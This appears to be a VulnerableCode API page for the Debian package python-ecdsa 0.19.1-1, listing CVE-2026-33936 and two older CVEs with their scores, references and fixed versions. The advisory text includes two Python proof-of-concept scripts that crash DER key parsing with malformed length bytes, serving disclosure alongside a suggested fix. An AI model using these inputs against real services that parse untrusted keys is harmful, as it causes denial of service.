Django REST framework

Lookup for vulnerable packages by Package URL.

Purl pkg:deb/debian/python-ecdsa@0.19.1-1?distro=trixie

Type deb

Namespace debian

Name python-ecdsa

Version 0.19.1-1

Qualifiers

distro	trixie

Subpath

Is_vulnerable true

Next_non_vulnerable_version 0.19.2-1

Latest_non_vulnerable_version 0.19.2-1

Affected_by_vulnerabilities

url VCID-kbjk-tnfz-rfdw

vulnerability_id VCID-kbjk-tnfz-rfdw

summary

python-ecdsa: Denial of Service via improper DER length validation in crafted private keys
## Summary

An issue in the low-level DER parsing functions can cause unexpected exceptions to be raised from the public API functions.

1. `ecdsa.der.remove_octet_string()` accepts truncated DER where the encoded length exceeds the available buffer. For example, an OCTET STRING that declares a length of 4096 bytes but provides only 3 bytes is parsed successfully instead of being rejected.

2. Because of that, a crafted DER input can cause `SigningKey.from_der()` to raise an internal exception (`IndexError: index out of bounds on dimension 1`) rather than cleanly rejecting malformed DER (e.g., raising `UnexpectedDER` or `ValueError`). Applications that parse untrusted DER private keys may crash if they do not handle unexpected exceptions, resulting in a denial of service.

## Impact

Potential denial-of-service when parsing untrusted DER private keys due to unexpected internal exceptions, and malformed DER acceptance due to missing bounds checks in DER helper functions.

## Reproduction

Attach and run the following PoCs:

###  poc_truncated_der_octet.py

```python
from ecdsa.der import remove_octet_string, UnexpectedDER

# OCTET STRING (0x04)
# Declared length: 0x82 0x10 0x00  -> 4096 bytes
# Actual body: only 3 bytes -> truncated DER
bad = b"\x04\x82\x10\x00" + b"ABC"

try:
    body, rest = remove_octet_string(bad)
    print("[BUG] remove_octet_string accepted truncated DER.")
    print("Declared length=4096, actual body_len=", len(body), "rest_len=", len(rest))
    print("Body=", body)
    print("Rest=", rest)
except UnexpectedDER as e:
    print("[OK] Rejected malformed DER:", e)
```

- Expected: reject malformed DER when declared length exceeds available bytes
- Actual: accepts the truncated DER and returns a shorter body
- Example output:
```
Parsed body_len= 3 rest_len= 0 (while declared length is 4096)
```

### poc_signingkey_from_der_indexerror.py

```python
from ecdsa import SigningKey, NIST256p
import ecdsa

print("ecdsa version:", ecdsa.__version__)

sk = SigningKey.generate(curve=NIST256p)
good = sk.to_der()
print("Good DER len:", len(good))


def find_crashing_mutation(data: bytes):
    b = bytearray(data)

    # Try every OCTET STRING tag position and corrupt a short-form length byte
    for i in range(len(b) - 4):
        if b[i] != 0x04:  # OCTET STRING tag
            continue

        L = b[i + 1]
        if L >= 0x80:
            # skip long-form lengths for simplicity
            continue

        max_possible = len(b) - (i + 2)
        if max_possible <= 10:
            continue

        # Claim more bytes than exist -> truncation
        newL = min(0x7F, max_possible + 20)
        b2 = bytearray(b)
        b2[i + 1] = newL

        try:
            SigningKey.from_der(bytes(b2))
        except Exception as e:
            return i, type(e).__name__, str(e)

    return None


res = find_crashing_mutation(good)
if res is None:
    print("[INFO] No exception triggered by this mutation strategy.")
else:
    i, etype, msg = res
    print("[BUG] SigningKey.from_der raised unexpected exception type.")
    print("Offset:", i, "Exception:", etype, "Message:", msg)
```

- Expected: reject malformed DER with `UnexpectedDER` or `ValueError`
- Actual: deterministically triggers an internal `IndexError` (DoS risk)
- Example output:
```
Result: (5, 'IndexError', 'index out of bounds on dimension 1')
```

## Suggested fix

Add “declared length must fit buffer” checks in DER helper functions similarly to the existing check in `remove_sequence()`:

- `remove_octet_string()`
- `remove_constructed()`
- `remove_implicit()`

Additionally, consider catching unexpected internal exceptions in DER key parsing paths and re-raising them as `UnexpectedDER` to avoid crashy failure modes.

## Credit

Mohamed Abdelaal (@0xmrma)

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-33936.json

reference_id

reference_type

scores

value	5.3
scoring_system	cvssv3
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-33936.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2026-33936

reference_id

reference_type

scores

value	0.00036
scoring_system	epss
scoring_elements	0.10743
published_at	2026-04-21T12:55:00Z

value	0.00107
scoring_system	epss
scoring_elements	0.28977
published_at	2026-04-02T12:55:00Z

value	0.00107
scoring_system	epss
scoring_elements	0.29027
published_at	2026-04-04T12:55:00Z

value	0.00107
scoring_system	epss
scoring_elements	0.28834
published_at	2026-04-07T12:55:00Z

value	0.00107
scoring_system	epss
scoring_elements	0.28902
published_at	2026-04-08T12:55:00Z

value	0.00107
scoring_system	epss
scoring_elements	0.28942
published_at	2026-04-09T12:55:00Z

value	0.00107
scoring_system	epss
scoring_elements	0.28947
published_at	2026-04-11T12:55:00Z

value	0.00107
scoring_system	epss
scoring_elements	0.28903
published_at	2026-04-12T12:55:00Z

value	0.00107
scoring_system	epss
scoring_elements	0.28853
published_at	2026-04-13T12:55:00Z

value	0.00107
scoring_system	epss
scoring_elements	0.28875
published_at	2026-04-16T12:55:00Z

value	0.00107
scoring_system	epss
scoring_elements	0.28851
published_at	2026-04-18T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2026-33936

reference_url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-33936
reference_id
reference_type
scores
url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-33936

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	5.3
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url

https://github.com/tlsfuzzer/python-ecdsa

reference_id

reference_type

scores

value	5.3
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://github.com/tlsfuzzer/python-ecdsa

reference_url

https://github.com/tlsfuzzer/python-ecdsa/commit/bd66899550d7185939bf27b75713a2ac9325a9d3

reference_id

reference_type

scores

value	5.3
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

value	MODERATE
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-01T13:44:27Z/

url

https://github.com/tlsfuzzer/python-ecdsa/commit/bd66899550d7185939bf27b75713a2ac9325a9d3

reference_url

https://github.com/tlsfuzzer/python-ecdsa/releases/tag/python-ecdsa-0.19.2

reference_id

reference_type

scores

value	5.3
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

value	MODERATE
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-01T13:44:27Z/

url

https://github.com/tlsfuzzer/python-ecdsa/releases/tag/python-ecdsa-0.19.2

reference_url

https://github.com/tlsfuzzer/python-ecdsa/security/advisories/GHSA-9f5j-8jwj-x28g

reference_id

reference_type

scores

value	5.3
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

value	MODERATE
scoring_system	cvssv3.1_qr
scoring_elements

value	MODERATE
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-01T13:44:27Z/

url

https://github.com/tlsfuzzer/python-ecdsa/security/advisories/GHSA-9f5j-8jwj-x28g

reference_url

https://nvd.nist.gov/vuln/detail/CVE-2026-33936

reference_id

reference_type

scores

value	5.3
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://nvd.nist.gov/vuln/detail/CVE-2026-33936

reference_url	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1132164
reference_id	1132164
reference_type
scores
url	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1132164

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=2452539
reference_id	2452539
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=2452539

reference_url

https://github.com/advisories/GHSA-9f5j-8jwj-x28g

reference_id

GHSA-9f5j-8jwj-x28g

reference_type

scores

value	MODERATE
scoring_system	cvssv3.1_qr
scoring_elements

url

https://github.com/advisories/GHSA-9f5j-8jwj-x28g

fixed_packages

url	pkg:deb/debian/python-ecdsa@0.19.2-1?distro=trixie
purl	pkg:deb/debian/python-ecdsa@0.19.2-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/python-ecdsa@0.19.2-1%3Fdistro=trixie

aliases CVE-2026-33936, GHSA-9f5j-8jwj-x28g

risk_score 3.1

exploitability 0.5

weighted_severity 6.2

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-kbjk-tnfz-rfdw

Fixing_vulnerabilities

url VCID-9pe3-67b4-yqae

vulnerability_id VCID-9pe3-67b4-yqae

summary A flaw was found in all python-ecdsa versions before 0.13.3, where it did not correctly verify whether signatures used DER encoding. Without this verification, a malformed signature could be accepted, making the signature malleable. Without proper verification, an attacker could use a malleable signature to create false transactions.

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-14859.json

reference_id

reference_type

scores

value	7.4
scoring_system	cvssv3
scoring_elements	CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-14859.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2019-14859

reference_id

reference_type

scores

value	0.00065
scoring_system	epss
scoring_elements	0.20293
published_at	2026-04-21T12:55:00Z

value	0.00065
scoring_system	epss
scoring_elements	0.20296
published_at	2026-04-18T12:55:00Z

value	0.00065
scoring_system	epss
scoring_elements	0.20291
published_at	2026-04-16T12:55:00Z

value	0.00065
scoring_system	epss
scoring_elements	0.20303
published_at	2026-04-13T12:55:00Z

value	0.00065
scoring_system	epss
scoring_elements	0.20361
published_at	2026-04-12T12:55:00Z

value	0.00065
scoring_system	epss
scoring_elements	0.20309
published_at	2026-04-01T12:55:00Z

value	0.00065
scoring_system	epss
scoring_elements	0.20377
published_at	2026-04-09T12:55:00Z

value	0.00065
scoring_system	epss
scoring_elements	0.20318
published_at	2026-04-08T12:55:00Z

value	0.00065
scoring_system	epss
scoring_elements	0.20238
published_at	2026-04-07T12:55:00Z

value	0.00065
scoring_system	epss
scoring_elements	0.20512
published_at	2026-04-04T12:55:00Z

value	0.00065
scoring_system	epss
scoring_elements	0.20453
published_at	2026-04-02T12:55:00Z

value	0.00065
scoring_system	epss
scoring_elements	0.20406
published_at	2026-04-11T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2019-14859

reference_url

https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14859

reference_id

reference_type

scores

value	9.1
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

value	9.3
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N

value	CRITICAL
scoring_system	generic_textual
scoring_elements

url

https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14859

reference_url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14853
reference_id
reference_type
scores
url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14853

reference_url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14859
reference_id
reference_type
scores
url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14859

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	6.8
scoring_system	cvssv3
scoring_elements	CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url

https://github.com/advisories/GHSA-8qxj-f9rh-9fg2

reference_id

reference_type

scores

value	9.1
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

value	CRITICAL
scoring_system	cvssv3.1_qr
scoring_elements

value	9.3
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N

value	CRITICAL
scoring_system	generic_textual
scoring_elements

url

https://github.com/advisories/GHSA-8qxj-f9rh-9fg2

reference_url

https://github.com/pypa/advisory-database/tree/main/vulns/ecdsa/PYSEC-2020-163.yaml

reference_id

reference_type

scores

value	9.1
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

value	9.3
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N

value	CRITICAL
scoring_system	generic_textual
scoring_elements

url

https://github.com/pypa/advisory-database/tree/main/vulns/ecdsa/PYSEC-2020-163.yaml

reference_url

https://github.com/tlsfuzzer/python-ecdsa/commit/3427fa29f319b27898a28601955807abb44c0830

reference_id

reference_type

scores

value	9.1
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

value	9.3
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N

value	CRITICAL
scoring_system	generic_textual
scoring_elements

url

https://github.com/tlsfuzzer/python-ecdsa/commit/3427fa29f319b27898a28601955807abb44c0830

reference_url

https://github.com/tlsfuzzer/python-ecdsa/commit/9080d1d5ac533da0de00466aaffb49bee808bb4e

reference_id

reference_type

scores

value	9.1
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

value	9.3
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N

value	CRITICAL
scoring_system	generic_textual
scoring_elements

url

https://github.com/tlsfuzzer/python-ecdsa/commit/9080d1d5ac533da0de00466aaffb49bee808bb4e

reference_url

https://github.com/tlsfuzzer/python-ecdsa/commit/b0ea52bb3aa9a16c9a4a91fdc0041edbfed10b31

reference_id

reference_type

scores

value	9.1
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

value	9.3
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N

value	CRITICAL
scoring_system	generic_textual
scoring_elements

url

https://github.com/tlsfuzzer/python-ecdsa/commit/b0ea52bb3aa9a16c9a4a91fdc0041edbfed10b31

reference_url

https://github.com/warner/python-ecdsa

reference_id

reference_type

scores

value	9.1
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

value	9.3
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N

value	CRITICAL
scoring_system	generic_textual
scoring_elements

url

https://github.com/warner/python-ecdsa

reference_url

https://github.com/warner/python-ecdsa/issues/114

reference_id

reference_type

scores

value	9.1
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

value	9.3
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N

value	CRITICAL
scoring_system	generic_textual
scoring_elements

url

https://github.com/warner/python-ecdsa/issues/114

reference_url

https://github.com/warner/python-ecdsa/pull/115

reference_id

reference_type

scores

value	9.1
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

value	9.3
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N

value	CRITICAL
scoring_system	generic_textual
scoring_elements

url

https://github.com/warner/python-ecdsa/pull/115

reference_url

https://github.com/warner/python-ecdsa/releases/tag/python-ecdsa-0.13.3

reference_id

reference_type

scores

value	9.1
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

value	9.3
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N

value	CRITICAL
scoring_system	generic_textual
scoring_elements

url

https://github.com/warner/python-ecdsa/releases/tag/python-ecdsa-0.13.3

reference_url

https://nvd.nist.gov/vuln/detail/CVE-2019-14859

reference_id

reference_type

scores

value	9.1
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

value	9.3
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N

value	CRITICAL
scoring_system	generic_textual
scoring_elements

url

https://nvd.nist.gov/vuln/detail/CVE-2019-14859

reference_url

https://pypi.org/project/ecdsa/0.13.3

reference_id

reference_type

scores

value	9.1
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

value	9.3
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N

value	CRITICAL
scoring_system	generic_textual
scoring_elements

url

https://pypi.org/project/ecdsa/0.13.3

reference_url	https://pypi.org/project/ecdsa/0.13.3/
reference_id
reference_type
scores
url	https://pypi.org/project/ecdsa/0.13.3/

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=1760843
reference_id	1760843
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=1760843

reference_url	https://access.redhat.com/errata/RHSA-2021:4702
reference_id	RHSA-2021:4702
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2021:4702

reference_url	https://usn.ubuntu.com/4196-1/
reference_id	USN-4196-1
reference_type
scores
url	https://usn.ubuntu.com/4196-1/

fixed_packages

url	pkg:deb/debian/python-ecdsa@0.13.3-1?distro=trixie
purl	pkg:deb/debian/python-ecdsa@0.13.3-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/python-ecdsa@0.13.3-1%3Fdistro=trixie

url pkg:deb/debian/python-ecdsa@0.16.1-1?distro=trixie

purl pkg:deb/debian/python-ecdsa@0.16.1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-kbjk-tnfz-rfdw

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/python-ecdsa@0.16.1-1%3Fdistro=trixie

url pkg:deb/debian/python-ecdsa@0.18.0-3?distro=trixie

purl pkg:deb/debian/python-ecdsa@0.18.0-3?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-kbjk-tnfz-rfdw

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/python-ecdsa@0.18.0-3%3Fdistro=trixie

url pkg:deb/debian/python-ecdsa@0.19.1-1?distro=trixie

purl pkg:deb/debian/python-ecdsa@0.19.1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-kbjk-tnfz-rfdw

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/python-ecdsa@0.19.1-1%3Fdistro=trixie

url	pkg:deb/debian/python-ecdsa@0.19.2-1?distro=trixie
purl	pkg:deb/debian/python-ecdsa@0.19.2-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/python-ecdsa@0.19.2-1%3Fdistro=trixie

aliases CVE-2019-14859, GHSA-8qxj-f9rh-9fg2, PYSEC-2020-163

risk_score 4.5

exploitability 0.5

weighted_severity 9.0

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-9pe3-67b4-yqae

url VCID-qrf7-gnjg-bfat

vulnerability_id VCID-qrf7-gnjg-bfat

summary An error-handling flaw was found in python-ecdsa before version 0.13.3. During signature decoding, malformed DER signatures could raise unexpected exceptions (or no exceptions at all), which could lead to a denial of service.

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-14853.json

reference_id

reference_type

scores

value	3.7
scoring_system	cvssv3
scoring_elements	CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-14853.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2019-14853

reference_id

reference_type

scores

value	0.00068
scoring_system	epss
scoring_elements	0.20888
published_at	2026-04-21T12:55:00Z

value	0.00068
scoring_system	epss
scoring_elements	0.20907
published_at	2026-04-18T12:55:00Z

value	0.00068
scoring_system	epss
scoring_elements	0.20905
published_at	2026-04-16T12:55:00Z

value	0.00068
scoring_system	epss
scoring_elements	0.20914
published_at	2026-04-13T12:55:00Z

value	0.00068
scoring_system	epss
scoring_elements	0.20967
published_at	2026-04-12T12:55:00Z

value	0.00068
scoring_system	epss
scoring_elements	0.2114
published_at	2026-04-04T12:55:00Z

value	0.00068
scoring_system	epss
scoring_elements	0.20996
published_at	2026-04-09T12:55:00Z

value	0.00068
scoring_system	epss
scoring_elements	0.20934
published_at	2026-04-08T12:55:00Z

value	0.00068
scoring_system	epss
scoring_elements	0.20854
published_at	2026-04-07T12:55:00Z

value	0.00068
scoring_system	epss
scoring_elements	0.20936
published_at	2026-04-01T12:55:00Z

value	0.00068
scoring_system	epss
scoring_elements	0.21087
published_at	2026-04-02T12:55:00Z

value	0.00068
scoring_system	epss
scoring_elements	0.21012
published_at	2026-04-11T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2019-14853

reference_url

https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14853

reference_id

reference_type

scores

value	7.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	8.7
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

value	HIGH
scoring_system	generic_textual
scoring_elements

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14853

reference_url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14853
reference_id
reference_type
scores
url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14853

reference_url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14859
reference_id
reference_type
scores
url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14859

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	5.3
scoring_system	cvssv3
scoring_elements	CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url

https://github.com/advisories/GHSA-2mrj-435v-c2cr

reference_id

reference_type

scores

value	MODERATE
scoring_system	cvssv3.1_qr
scoring_elements

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://github.com/advisories/GHSA-2mrj-435v-c2cr

reference_url

https://github.com/advisories/GHSA-pwfw-mgfj-7g3g

reference_id

reference_type

scores

value	HIGH
scoring_system	cvssv3.1_qr
scoring_elements

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://github.com/advisories/GHSA-pwfw-mgfj-7g3g

reference_url

https://github.com/pypa/advisory-database/tree/main/vulns/ecdsa/PYSEC-2019-177.yaml

reference_id

reference_type

scores

value	7.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	8.7
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

value	HIGH
scoring_system	generic_textual
scoring_elements

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://github.com/pypa/advisory-database/tree/main/vulns/ecdsa/PYSEC-2019-177.yaml

reference_url

https://github.com/warner/python-ecdsa

reference_id

reference_type

scores

value	7.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	8.7
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

value	HIGH
scoring_system	generic_textual
scoring_elements

url

https://github.com/warner/python-ecdsa

reference_url

https://github.com/warner/python-ecdsa/releases/tag/python-ecdsa-0.13.3

reference_id

reference_type

scores

value	7.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	8.7
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

value	HIGH
scoring_system	generic_textual
scoring_elements

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://github.com/warner/python-ecdsa/releases/tag/python-ecdsa-0.13.3

reference_url

https://github.com/warner/python-ecdsa/security/advisories/GHSA-pwfw-mgfj-7g3g

reference_id

reference_type

scores

value	7.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	HIGH
scoring_system	cvssv3.1_qr
scoring_elements

value	8.7
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

value	HIGH
scoring_system	generic_textual
scoring_elements

url

https://github.com/warner/python-ecdsa/security/advisories/GHSA-pwfw-mgfj-7g3g

reference_url

https://nvd.nist.gov/vuln/detail/CVE-2019-14853

reference_id

reference_type

scores

value	7.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	8.7
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

value	HIGH
scoring_system	generic_textual
scoring_elements

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://nvd.nist.gov/vuln/detail/CVE-2019-14853

reference_url

https://seclists.org/bugtraq/2019/Dec/33

reference_id

reference_type

scores

value	7.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	8.7
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

value	HIGH
scoring_system	generic_textual
scoring_elements

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://seclists.org/bugtraq/2019/Dec/33

reference_url

https://www.debian.org/security/2019/dsa-4588

reference_id

reference_type

scores

value	7.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	8.7
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

value	HIGH
scoring_system	generic_textual
scoring_elements

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://www.debian.org/security/2019/dsa-4588

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=1758704
reference_id	1758704
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=1758704

reference_url	https://access.redhat.com/errata/RHSA-2021:4702
reference_id	RHSA-2021:4702
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2021:4702

reference_url	https://usn.ubuntu.com/4196-1/
reference_id	USN-4196-1
reference_type
scores
url	https://usn.ubuntu.com/4196-1/

fixed_packages

url	pkg:deb/debian/python-ecdsa@0.13.3-1?distro=trixie
purl	pkg:deb/debian/python-ecdsa@0.13.3-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/python-ecdsa@0.13.3-1%3Fdistro=trixie

url pkg:deb/debian/python-ecdsa@0.16.1-1?distro=trixie

purl pkg:deb/debian/python-ecdsa@0.16.1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-kbjk-tnfz-rfdw

